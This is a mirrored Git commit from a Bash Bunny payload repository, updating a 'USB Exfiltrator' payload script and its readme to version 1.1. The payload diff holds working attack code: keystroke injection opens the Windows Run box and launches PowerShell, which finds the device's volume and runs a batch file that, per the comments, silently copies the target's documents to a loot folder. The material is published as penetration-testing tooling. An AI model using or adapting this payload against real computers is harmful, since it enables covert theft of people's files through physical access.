weyne/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5darren/bashbunny-payloads.git synced 2025-10-29 16:58:12 +00:00
Code Issues Packages Projects Releases Wiki Activity

Updated USB Exfiltrator payload for Bash Bunny v1.1

Browse Source
This commit is contained in:
Darren Kitchen
2017-04-07 16:30:44 +10:00
parent d8ab0ac587
commit 4ce2b50cb2
2 changed files with 15 additions and 19 deletions
Download Patch File Download Diff File Expand all files Collapse all files

17
payloads/library/usb_exfiltrator/payload.txt
View File

@@ -1,23 +1,18 @@
#!/bin/bash #!/bin/bash
# #
# Title: USB Exfiltration # Title: USB Exfiltrator
# Author: Hak5Darren # Author: Hak5Darren
# Version: 1.0 # Version: 1.1
# Target: Windows XP SP3+ # Target: Windows XP SP3+
# Props: Diggster, IMcPwn # Props: Diggster, IMcPwn
# Category: Exfiltration
# #
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs # which in turn executes e.cmd invisibly using i.vbs
# which in turn copies documents to the loot folder on the Bash Bunny. # which in turn copies documents to the loot folder on the Bash Bunny.
# #
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION LED ATTACK
source bunny_helpers.sh
LED R
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
QUACK GUI r RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK DELAY 100 LED FINISH
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
QUACK ENTER
LED G

17
payloads/library/usb_exfiltrator/readme.md
View File

@@ -1,8 +1,11 @@
# Exfiltrator for Bash Bunnys # Exfiltrator for Bash Bunnys
* Author: Hak5Darren - Title: USB Exfiltrator
* Version: Version 1.1 - Author: Hak5Darren
* Target: Windows - Version: 1.1
- Target: Windows XP SP3+
- Props: Diggster, IMcPwn
- Category: Exfiltration
## Description ## Description
@@ -15,11 +18,9 @@ By default the staged payload exfiltrates PDF files. Change the xcopy commands f
## STATUS ## STATUS
| LED | Status | | LED | Status |
| ------------------ | -------------------------------------------- | | -------- | ------------ |
| White (blinking) | Setup Failed. Target didn't obtain IP | | ATTACK | Attacking :) |
| Red | Attack Setup |
| Green | Attack Complete |
## Discussion ## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40225-payload-usb_exfiltrator/ "Hak5 Forum Thread") [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40225-payload-usb_exfiltrator/ "Hak5 Forum Thread")